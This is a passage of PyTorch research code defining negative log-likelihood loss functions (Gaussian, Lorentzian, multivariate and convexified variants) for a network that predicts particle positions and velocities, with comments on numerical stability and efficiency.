:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, 2]- 1 is (x,y) and 1 is (v_x,v_y)
:param epoch: value of the current epoch
:param temperature: temperature used for the softplus for the additional biasing
:param total_epochs: number of total epochs
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms)
"""
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
# select the positions for coords (2D) for 3D coords go to (0,1,2), (3,4,5) same coordes for position
indices_pos = torch.LongTensor([0, 1])
indices_vel = torch.LongTensor([2, 3])
indices_pos_var = torch.LongTensor([0])
indices_vel_var = torch.LongTensor([1])
if preds.is_cuda:
indices_pos, indices_vel, indices_pos_var, indices_vel_var = indices_pos.cuda(), indices_vel.cuda(), indices_pos_var.cuda(), indices_vel_var.cuda()
positions = torch.index_select(preds, 3, indices_pos)
velocities = torch.index_select(preds, 3, indices_vel)
pos_targets = torch.index_select(target, 3, indices_pos)
vel_targets = torch.index_select(target, 3, indices_vel)
pos_var = torch.index_select(variance, 3, indices_pos_var)
vel_var = torch.index_select(variance, 3, indices_vel_var)
# recast the positions to the correct size
pos_var = tile(pos_var, 3, list(positions.size())[3])
vel_var = tile(vel_var, 3, list(velocities.size())[3])
# gets the value of the loss
neg_log_p = ((positions- pos_targets) ** 2 / (2 * pos_var)) + ((velocities - vel_targets) ** 2 / (2 * vel_var))
# additional terms to add if we want to test how biasing helps
# + 0.1* (1-sigmoid(epoch, total_epochs/2, temperature)) * ((preds-target) ** 2 +variance)
# np.exp(-epoch/temperature) *
# neg_log_p = ((preds - target) ** 2 / (2 * variance))- 0.0000001/ sigma
# determinant of the covariance matrix with diagonal terms
determinant = torch.prod(variance, 3).unsqueeze(3)
loss_1 = neg_log_p
loss_2 = 0.0
if add_const:
const = (0.5 * torch.log(2*np.pi* determinant))
neg_log_p = neg_log_p + const
loss_2 += const
return neg_log_p.sum() / (target.size(0) * target.size(1)), loss_1.sum() / (target.size(0) * target.size(1)) , loss_2.sum() / (target.size(0) * target.size(1)) # normalisation here is (batch * num atoms)
def nll_gaussian_var__variablesigma_semiisotropic(preds, target, sigma, epoch, temperature, total_epochs, add_const=True):
"""
Loss function for the case of variable sigma- semiisotropic => isotropic in (x,y) and (vx,vy)
returns the variance over the batch of the reconstruction loss
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, 2]- 1 is (x,y) and 1 is (v_x,v_y)
:param epoch: value of the current epoch
:param temperature: temperature used for the softplus for the additional biasing
:param total_epochs: number of total epochs
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: variation of the loss function
"""
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
# select the positions for coords (2D) for 3D coords go to (0,1,2), (3,4,5) same coordes for position
indices_pos = torch.LongTensor([0, 1])
indices_vel = torch.LongTensor([2, 3])
indices_pos_var = torch.LongTensor([0])
indices_vel_var = torch.LongTensor([1])
if preds.is_cuda:
indices_pos, indices_vel, indices_pos_var, indices_vel_var = indices_pos.cuda(), indices_vel.cuda(), indices_pos_var.cuda(), indices_vel_var.cuda()
positions = torch.index_select(preds, 3, indices_pos)
velocities = torch.index_select(preds, 3, indices_vel)
pos_targets = torch.index_select(target, 3, indices_pos)
vel_targets = torch.index_select(target, 3, indices_vel)
pos_var = torch.index_select(variance, 3, indices_pos_var)
vel_var = torch.index_select(variance, 3, indices_vel_var)
# recast the positions to the correct size
pos_var = tile(pos_var, 3, list(positions.size())[3])
vel_var = tile(vel_var, 3, list(velocities.size())[3])
# gets the value of the loss
neg_log_p = ((positions - pos_targets) ** 2 / (2 * pos_var)) + ((velocities - vel_targets) ** 2 / (2 * vel_var))
# additional terms to add if we want to test how biasing helps
# + 0.1* (1-sigmoid(epoch, total_epochs/2, temperature)) * ((preds-target) ** 2 +variance)
# np.exp(-epoch/temperature) *
# neg_log_p = ((preds - target) ** 2 / (2 * variance))- 0.0000001/ sigma
# determinant of the covariance matrix with diagonal terms
determinant = torch.prod(variance, 3).unsqueeze(3)
loss_1 = neg_log_p
loss_2 = 0.0
if add_const:
const = (0.5 * torch.log(2 * np.pi * determinant))
neg_log_p = neg_log_p + const
loss_2 += const
return (neg_log_p.sum(dim=1)/target.size(1)).var()
def nll_lorentzian(preds, target, gamma):
"""
Isotropic lorentzian loss function
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param gamma: The tensor for the FWHM of the distribution of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:return: value of the loss function normalised by (batch * number of atoms)
"""
gammasquared = gamma ** 2
neg_log_p = torch.log(1+((preds - target) ** 2 / (gammasquared)))
neg_log_p += torch.log(gamma)
return neg_log_p.sum() / (target.size(0) * target.size(1))
def nll_lorentzian_var(preds, target, gamma):
"""
Isotropic lorentzian loss function
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param gamma: The tensor for the FWHM of the distribution of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:return: variance of the loss function normalised by (batch * number of atoms)
"""
gammasquared = gamma ** 2
neg_log_p = torch.log(1+((preds - target) ** 2 / (gammasquared)))
neg_log_p += torch.log(gamma)
return (neg_log_p.sum(dim=1)/target.size(1)).var()
def nll_gaussian_multivariatesigma_efficient(preds, target, sigma, accel, vel, add_const=True):
"""
Loss function for the case of variable sigma multivariate normal case
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param accel: gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
:param vel: gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms), value for loss of each term
"""
# get normalised vectors for acceleration and velocities v|| and a||
# t = time.time()
velnorm = vel.norm(p=2, dim = 3, keepdim = True)
normalisedvel = vel.div(velnorm.expand_as(vel))
# 1/sqrt(2) - isotropic => direction unimportant. chosen here to improve efficiency
normalisedvel[torch.isnan(normalisedvel)] = np.power(1/2, 1/2)
accelnorm = accel.norm(p=2, dim = 3, keepdim = True)
normalisedaccel = accel.div(accelnorm.expand_as(accel))
normalisedaccel[torch.isnan(normalisedaccel)] = np.power(1 / 2, 1 / 2)
# print('extractdata: {:.1f}s'.format(time.time() - t))
# get perpendicular components to the accelerations and velocities accelperp, velperp
# # note in 2D perpendicular vector is just rotation by pi/2 about origin (x,y) -> (-y,x)
# tim = time.time()
# velperp = torch.zeros(normalisedvel.size()[0], normalisedvel.size()[1], normalisedvel.size()[2], normalisedvel.size()[3])
# accelperp = torch.zeros(accelnorm.size()[0], accelnorm.size()[1], accelnorm.size()[2], normalisedvel.size()[3])
# for i in range(normalisedvel.size()[0]):
# for j in range(normalisedvel[i].size()[0]):
# for k in range(normalisedvel[i][j].size()[0]):
# velperp[i][j][k][0] = -normalisedvel[i][j][k][1]
# velperp[i][j][k][1] = normalisedvel[i][j][k][0]
# accelperp[i][j][k][0] = -normalisedaccel[i][j][k][1]
# accelperp[i][j][k][1] = normalisedaccel[i][j][k][0]
# if preds.is_cuda:
# velperp, accelperp = velperp.cuda(), accelperp.cuda()
# print('getperp: {:.1f}s'.format(time.time() - tim))
# need Sigma=Sigma^2, Sigma^-2 and det(Sigma)
# ti = time.time()
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
determinant = torch.prod(variance, 3).unsqueeze(3)
inversevariance = variance ** -1
# need position and velocity differences in (x,y) coordinates
differences = preds-target
indices_pos = torch.LongTensor([0,1])
indices_vel = torch.LongTensor([2,3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
position_differences = torch.index_select(differences, 3, indices_pos)
velocity_differences = torch.index_select(differences, 3, indices_vel)
position_differences = position_differences.unsqueeze(4)
velocity_differences = velocity_differences.unsqueeze(4)# (x-mu)
# print('getdifferences: {:.1f}s'.format(time.time() - ti))
# the matrix multiplication for multivariate case can be thought of as taking a projection of the error vector
# along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2 along that
# direction. This follows directly from the fact the rotation matrix is orthogonal.
# multime = time.time()
# surprisingly it is more efficient to calculate the perpendicular term by considering
# (position_differences - (position_differences.v||)v||).vperp to get the position differences in the perpendicular
# direction than using rotation (x,y) -> (-y,x) as the triple for loop is inefficient. about 100x faster this way
# and almost as fast as isotropic
errorvectorparalleltov = torch.matmul(normalisedvel.unsqueeze(3), position_differences)
parallelterm = torch.matmul(normalisedvel.unsqueeze(4), errorvectorparalleltov)
perpterm = (position_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim = 3, keepdim = True)
# NaN can occur when dividing by 0 (see comment below) but the problem with replacing NaN after the division is that
# the NaN carries through anyway - the function that the system is backtracking through keeps the NaN =
# therefore leads to NaN errors on the second pass of the function - replacing the 0's before division solves this
# issue.
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
# NaN can occur when perpterm is 0, this means that preds-true = (preds-true).v|| v||
# i.e. error entirely in parallel direction and no error perpendicular: so we set these terms to 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
# gets the error vectors
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
errorvectorparalleltoa = torch.matmul(normalisedaccel.unsqueeze(3), velocity_differences)
parallelterm = torch.matmul(normalisedaccel.unsqueeze(4), errorvectorparalleltoa)
perpterm = (velocity_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
# NaN when preds-target is entirely in the v parallel direction. This means the error in the perpendiular
# direction is 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptoa = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltoa = errorvectorparalleltoa.squeeze()
# errorvectorperptoa = torch.matmul(accelperp.unsqueeze(3), velocity_differences).squeeze()
indices_vpar = torch.LongTensor([0])
indices_vperp = torch.LongTensor([1])
indices_apar = torch.LongTensor([2])
indices_aperp = torch.LongTensor([3])
#print('matrixmult: {:.1f}s'.format(time.time() - multime))
if preds.is_cuda:
indices_vpar, indices_vperp, indices_apar, indices_aperp = indices_vpar.cuda(), indices_vperp.cuda(), indices_apar.cuda(), indices_aperp.cuda()
# t = time.time()
# gets the loss components
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(inversevariance, 3, indices_vpar).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(inversevariance, 3, indices_vperp).squeeze()
losscomponentparalleltoa = (errorvectorparalleltoa ** 2) * torch.index_select(inversevariance, 3, indices_apar).squeeze()
losscomponentperptoa = (errorvectorperptoa ** 2) * torch.index_select(inversevariance, 3, indices_aperp).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov + losscomponentparalleltoa + losscomponentperptoa
loss_1 = neg_log_loss
loss_2 = 0.0
# print('getlosscomponents: {:.1f}s'.format(time.time() - t))
if add_const:
const = (0.5 * torch.log(2*np.pi* determinant))
neg_log_loss += const.squeeze()
loss_2 += const.squeeze()
return (neg_log_loss).sum() / (target.size(0) * target.size(1)), loss_1.sum() / (target.size(0) * target.size(1)) , loss_2 / (target.size(0) * target.size(1)) # normalisation here is (batch * num atoms)
def nll_gaussian_var_multivariatesigma_efficient(preds, target, sigma, accel, vel, add_const=True):
"""
Loss function for the case of variable sigma multivariate normal case
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param accel: gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
:param vel: gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: variance of the loss function
"""
# get normalised vectors for acceleration and velocities v|| and a||
velnorm = vel.norm(p=2, dim=3, keepdim=True)
normalisedvel = vel.div(velnorm.expand_as(vel))
normalisedvel[torch.isnan(normalisedvel)] = np.power(1 / 2, 1 / 2)
accelnorm = accel.norm(p=2, dim=3, keepdim=True)
normalisedaccel = accel.div(accelnorm.expand_as(accel))
# get perpendicular components to the accelerations and velocities accelperp, velperp
# # note in 2D perpendicular vector is just rotation by pi/2 about origin (x,y) -> (-y,x)
# velperp = torch.zeros(normalisedvel.size()[0], normalisedvel.size()[1], normalisedvel.size()[2],
# normalisedvel.size()[3])
# accelperp = torch.zeros(accelnorm.size()[0], accelnorm.size()[1], accelnorm.size()[2], normalisedvel.size()[3])
# for i in range(normalisedvel.size()[0]):
# for j in range(normalisedvel[i].size()[0]):
# for k in range(normalisedvel[i][j].size()[0]):
# velperp[i][j][k][0] = -normalisedvel[i][j][k][1]
# velperp[i][j][k][1] = normalisedvel[i][j][k][0]
# accelperp[i][j][k][0] = -normalisedaccel[i][j][k][1]
# accelperp[i][j][k][1] = normalisedaccel[i][j][k][0]
# if preds.is_cuda:
# velperp, accelperp = velperp.cuda(), accelperp.cuda()
# need Sigma=Sigma^2, Sigma^-2 and det(Sigma)
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
determinant = torch.prod(variance, 3).unsqueeze(3)
inversevariance = variance ** -1
# need position and velocity differences in (x,y) coordinates
differences = preds - target
indices_pos = torch.LongTensor([0, 1])
indices_vel = torch.LongTensor([2, 3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
position_differences = torch.index_select(differences, 3, indices_pos)
velocity_differences = torch.index_select(differences, 3, indices_vel)
position_differences = position_differences.unsqueeze(4)
velocity_differences = velocity_differences.unsqueeze(4) # (x-mu)
# the matrix multiplication for multivariate case can be thought of as taking a projection of the error vector
# along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2 along that
# direction. This follows directly from the fact the rotation matrix is orthogonal.
errorvectorparalleltov = torch.matmul(normalisedvel.unsqueeze(3), position_differences)
parallelterm = torch.matmul(normalisedvel.unsqueeze(4), errorvectorparalleltov)
perpterm = (position_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
errorvectorparalleltoa = torch.matmul(normalisedaccel.unsqueeze(3), velocity_differences)
parallelterm = torch.matmul(normalisedaccel.unsqueeze(4), errorvectorparalleltoa)
perpterm = (velocity_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptoa = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltoa = errorvectorparalleltoa.squeeze()
indices_vpar = torch.LongTensor([0])
indices_vperp = torch.LongTensor([1])
indices_apar = torch.LongTensor([2])
indices_aperp = torch.LongTensor([3])
if preds.is_cuda:
indices_vpar, indices_vperp, indices_apar, indices_aperp = indices_vpar.cuda(), indices_vperp.cuda(), indices_apar.cuda(), indices_aperp.cuda()
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(inversevariance, 3,
indices_vpar).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(inversevariance, 3, indices_vperp).squeeze()
losscomponentparalleltoa = (errorvectorparalleltoa ** 2) * torch.index_select(inversevariance, 3,
indices_apar).squeeze()
losscomponentperptoa = (errorvectorperptoa ** 2) * torch.index_select(inversevariance, 3, indices_aperp).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov + losscomponentparalleltoa + losscomponentperptoa
loss_1 = neg_log_loss
loss_2 = 0.0
if add_const:
const = (0.5 * torch.log(2 * np.pi * determinant))
neg_log_loss += const.squeeze()
loss_2 += const.squeeze()
return ((neg_log_loss).sum(dim=1)/target.size(1)).var()
def nll_gaussian_multivariatesigma_convexified(preds, target, sigma, accel, vel, sigma_prev, preds_prev, vvec, sigmavec, alpha, add_const=True):
"""
Loss function for the case of variable sigma multivariate normal case with added convexification. The Algorithm
follows that suggested by Edoardo Calvello
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param accel: gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
:param sigma_prev: previous prediction of sigma
:param preds_prev: previous prediction of the position and velocity space
:param vel: gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
:param vvec: vector that is used to provide the point of convexification from previous iteration. Size [batch, particles, timesteps, 4]
:param sigmavec: same as vvec but for sigma parameters. Size [batch, particles, timesteps, 4]
:param alpha: scale of the convexification. Float.
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms), value for loss of each term
"""
# according to algorithm, we want to convexify about yk= alphak vk-1 +(1-alphak)xk-1
yphasespace = alpha * vvec + (1-alpha) * preds_prev
ysigmaterm = alpha * sigmavec + (1-alpha) * sigma_prev
# get normalised vectors for acceleration and velocities v|| and a||
# t = time.time()
velnorm = vel.norm(p=2, dim = 3, keepdim = True)
normalisedvel = vel.div(velnorm.expand_as(vel))
# 1/sqrt(2) - isotropic => direction unimportant. chosen here to improve efficiency
normalisedvel[torch.isnan(normalisedvel)] = np.power(1/2, 1/2)
accelnorm = accel.norm(p=2, dim = 3, keepdim = True)
normalisedaccel = accel.div(accelnorm.expand_as(accel))
normalisedaccel[torch.isnan(normalisedaccel)] = np.power(1 / 2, 1 / 2)
# print('extractdata: {:.1f}s'.format(time.time() - t))
# get perpendicular components to the accelerations and velocities accelperp, velperp
# # note in 2D perpendicular vector is just rotation by pi/2 about origin (x,y) -> (-y,x)
# need Sigma=Sigma^2, Sigma^-2 and det(Sigma)
# ti = time.time()
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
determinant = torch.prod(variance, 3).unsqueeze(3)
inversevariance = variance ** -1
# need position and velocity differences in (x,y) coordinates
differences = preds-target
indices_pos = torch.LongTensor([0,1])
indices_vel = torch.LongTensor([2,3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
position_differences = torch.index_select(differences, 3, indices_pos)
velocity_differences = torch.index_select(differences, 3, indices_vel)
position_differences = position_differences.unsqueeze(4)
velocity_differences = velocity_differences.unsqueeze(4)# (x-mu)
# print('getdifferences: {:.1f}s'.format(time.time() - ti))
# the matrix multiplication for multivariate case can be thought of as taking a projection of the error vector
# along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2 along that
# direction. This follows directly from the fact the rotation matrix is orthogonal.
# multime = time.time()
# surprisingly it is more efficient to calculate the perpendicular term by considering
# (position_differences - (position_differences.v||)v||).vperp to get the position differences in the perpendicular
# direction than using rotation (x,y) -> (-y,x) as the triple for loop is inefficient. about 100x faster this way
# and almost as fast as isotropic
errorvectorparalleltov = torch.matmul(normalisedvel.unsqueeze(3), position_differences)
parallelterm = torch.matmul(normalisedvel.unsqueeze(4), errorvectorparalleltov)
perpterm = (position_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim = 3, keepdim = True)
# NaN can occur when dividing by 0 (see comment below) but the problem with replacing NaN after the division is that
# the NaN carries through anyway - the function that the system is backtracking through keeps the NaN =
# therefore leads to NaN errors on the second pass of the function - replacing the 0's before division solves this
# issue.
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
# NaN can occur when perpterm is 0, this means that preds-true = (preds-true).v|| v||
# i.e. error entirely in parallel direction and no error perpendicular: so we set these terms to 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
# gets the error vectors
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
errorvectorparalleltoa = torch.matmul(normalisedaccel.unsqueeze(3), velocity_differences)
parallelterm = torch.matmul(normalisedaccel.unsqueeze(4), errorvectorparalleltoa)
perpterm = (velocity_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
# NaN when preds-target is entirely in the v parallel direction. This means the error in the perpendiular
# direction is 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptoa = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltoa = errorvectorparalleltoa.squeeze()
# errorvectorperptoa = torch.matmul(accelperp.unsqueeze(3), velocity_differences).squeeze()
indices_vpar = torch.LongTensor([0])
indices_vperp = torch.LongTensor([1])
indices_apar = torch.LongTensor([2])
indices_aperp = torch.LongTensor([3])
#print('matrixmult: {:.1f}s'.format(time.time() - multime))
if preds.is_cuda:
indices_vpar, indices_vperp, indices_apar, indices_aperp = indices_vpar.cuda(), indices_vperp.cuda(), indices_apar.cuda(), indices_aperp.cuda()
# t = time.time()
# gets the loss components
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(inversevariance, 3, indices_vpar).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(inversevariance, 3, indices_vperp).squeeze()
losscomponentparalleltoa = (errorvectorparalleltoa ** 2) * torch.index_select(inversevariance, 3, indices_apar).squeeze()
losscomponentperptoa = (errorvectorperptoa ** 2) * torch.index_select(inversevariance, 3, indices_aperp).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov + losscomponentparalleltoa + losscomponentperptoa
loss_1 = neg_log_loss
loss_2 = 0.0
# print('getlosscomponents: {:.1f}s'.format(time.time() - t))
# convexifying term is 0.1 * ||x-y||^2 according to algorithm by Edoardo Calvello. lambda is chosen as 0.1 here
convterm = 0.1 * ((preds-target) - yphasespace) ** 2 + 0.1 * (sigma - ysigmaterm) ** 2
neg_log_loss += convterm.sum(dim = 3)
if add_const:
const = (0.5 * torch.log(2*np.pi* determinant))
neg_log_loss += const.squeeze()
loss_2 += const.squeeze()
return (neg_log_loss).sum() / (target.size(0) * target.size(1)), loss_1.sum() / (target.size(0) * target.size(1)) , loss_2 / (target.size(0) * target.size(1)) # normalisation here is (batch * num atoms)
def nll_gaussian_multivariatesigma_var_convexified(preds, target, sigma, accel, vel, sigma_prev, preds_prev, vvec, sigmavec, alpha, add_const=True):
"""
Loss function for the case of variable sigma multivariate normal case with added convexification. The Algorithm
follows that suggested by Edoardo Calvello
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param accel: gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
:param sigma_prev: previous prediction of sigma
:param preds_prev: previous prediction of the position and velocity space
:param vel: gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
:param vvec: vector that is used to provide the point of convexification from previous iteration. Size [batch, particles, timesteps, 4]
:param sigmavec: same as vvec but for sigma parameters. Size [batch, particles, timesteps, 4]
:param alpha: scale of the convexification. Float.
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms), value for loss of each term
"""
# according to algorithm, we want to convexify about yk= alphak vk-1 +(1-alphak)xk-1
yphasespace = alpha * vvec + (1-alpha) * preds_prev
ysigmaterm = alpha * sigmavec + (1-alpha) * sigma_prev
# get normalised vectors for acceleration and velocities v|| and a||
# t = time.time()
velnorm = vel.norm(p=2, dim = 3, keepdim = True)
normalisedvel = vel.div(velnorm.expand_as(vel))
# 1/sqrt(2) - isotropic => direction unimportant. chosen here to improve efficiency
normalisedvel[torch.isnan(normalisedvel)] = np.power(1/2, 1/2)
accelnorm = accel.norm(p=2, dim = 3, keepdim = True)
normalisedaccel = accel.div(accelnorm.expand_as(accel))
normalisedaccel[torch.isnan(normalisedaccel)] = np.power(1 / 2, 1 / 2)
# print('extractdata: {:.1f}s'.format(time.time() - t))
# get perpendicular components to the accelerations and velocities accelperp, velperp
# # note in 2D perpendicular vector is just rotation by pi/2 about origin (x,y) -> (-y,x)
# need Sigma=Sigma^2, Sigma^-2 and det(Sigma)
# ti = time.time()
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
determinant = torch.prod(variance, 3).unsqueeze(3)
inversevariance = variance ** -1
# need position and velocity differences in (x,y) coordinates
differences = preds-target
indices_pos = torch.LongTensor([0,1])
indices_vel = torch.LongTensor([2,3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
position_differences = torch.index_select(differences, 3, indices_pos)
velocity_differences = torch.index_select(differences, 3, indices_vel)
position_differences = position_differences.unsqueeze(4)
velocity_differences = velocity_differences.unsqueeze(4)# (x-mu)
# print('getdifferences: {:.1f}s'.format(time.time() - ti))
# the matrix multiplication for multivariate case can be thought of as taking a projection of the error vector
# along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2 along that
# direction. This follows directly from the fact the rotation matrix is orthogonal.
# multime = time.time()
# surprisingly it is more efficient to calculate the perpendicular term by considering
# (position_differences - (position_differences.v||)v||).vperp to get the position differences in the perpendicular
# direction than using rotation (x,y) -> (-y,x) as the triple for loop is inefficient. about 100x faster this way
# and almost as fast as isotropic
errorvectorparalleltov = torch.matmul(normalisedvel.unsqueeze(3), position_differences)
parallelterm = torch.matmul(normalisedvel.unsqueeze(4), errorvectorparalleltov)
perpterm = (position_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim = 3, keepdim = True)
# NaN can occur when dividing by 0 (see comment below) but the problem with replacing NaN after the division is that
